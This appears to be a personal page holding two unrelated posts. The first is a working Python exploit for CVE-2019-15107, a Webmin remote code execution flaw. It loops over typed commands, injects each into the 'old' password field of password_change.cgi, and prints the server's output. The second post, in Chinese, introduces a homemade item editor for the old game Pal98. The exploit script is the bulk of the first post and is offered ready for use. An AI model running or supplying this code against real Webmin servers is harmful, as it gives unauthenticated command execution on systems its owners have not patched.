CVE-2019-15107 Webmin RCE <=1.920 (unauthorized)

1.  Webmin <=1.920
2.  Password expiry policy set to Prompt users with expired passwords to enter a new one. 

Github: webmin_CVE-2019-15107

# Exploit Title: Webmin backdoor CVE-2019-15107 (RCE)
# Exploit author : chako
# Date: 2019-12-29
# Software Link: http://www.webmin.com/download.html (Webmin <= 1.920)
# Vuln Reported by: AkkuS 
# Original Post: https://www.pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
#                https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15107
#
# "Webmin installation must have Webmin -> Webmin Configuration -> Authentication -> 
# Password expiry policy set to Prompt users with expired passwords to enter a new one. 
# This option is not set by default, but if it is set, it allows remote code execution."
# ---- ( https://www.virtualmin.com/node/66890 )

#!/usr/bin/python
import requests
import sys
import re 

#target = "https://192.168.1.84:10000/password_change.cgi"

if len(sys.argv)>=2:
    target = "https://"+sys.argv[1]+":10000/password_change.cgi"
    cmd = raw_input("Command># ") 
else:
    print "\nUsage: python .\webmin.py [Target IP]\n"
    exit()

while cmd != "exit" :
    client = requests.session()
    requests.packages.urllib3.disable_warnings()
    payload = {'user':'root','pam':'','expired':'2','expired':'2','old':cmd,'new1':'opgg','new2':'opgg'}
    response = client.post(target, verify=False, data=payload,headers=dict(Referer=target))
	
    if response.ok:	    
		x = re.search("(is incorrect)(.*)<\/h3><\/center>", response.text.encode("utf-8"), flags=re.DOTALL)
		if (x):
		    print x.group().replace("</h3></center>","").replace("is incorrect","")
		else:
		    print("No match")
    else:
        print "error code --> ",response.status_code
		
    cmd = raw_input("Command># ") 
    print cmd
	


Reference Link:
https://www.pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15107

Pal98 Editor

仙劍奇俠傳是我接觸到的第二款電腦遊戲(第一款是德軍總部),
那時候都還只有DOS系統家裡也沒有電腦,都是去鄰居家玩。
後來仙劍公司釋出仙劍一可以讓玩家在電腦上玩 (有興趣的人可以到這看看: https://steachs.com/archives/1975 )。
老實說我很少玩遊戲,也沒玩過其他仙劍版本。但一直很喜歡仙劍一。

寫了一個物品修改器,可以在一開始就刷出”無塵劍”,和”金蠶王”等後期裝備。
希望大家會喜歡

# 情懷 # 是個念舊的人

Copy and run Pal98_editor.exe to the same folder as your Pal98 game folder.
You could download Pal98 at https://steachs.com/archives/1975

GitHub: https://github.com/ChakoMoonFish/Pal98_editor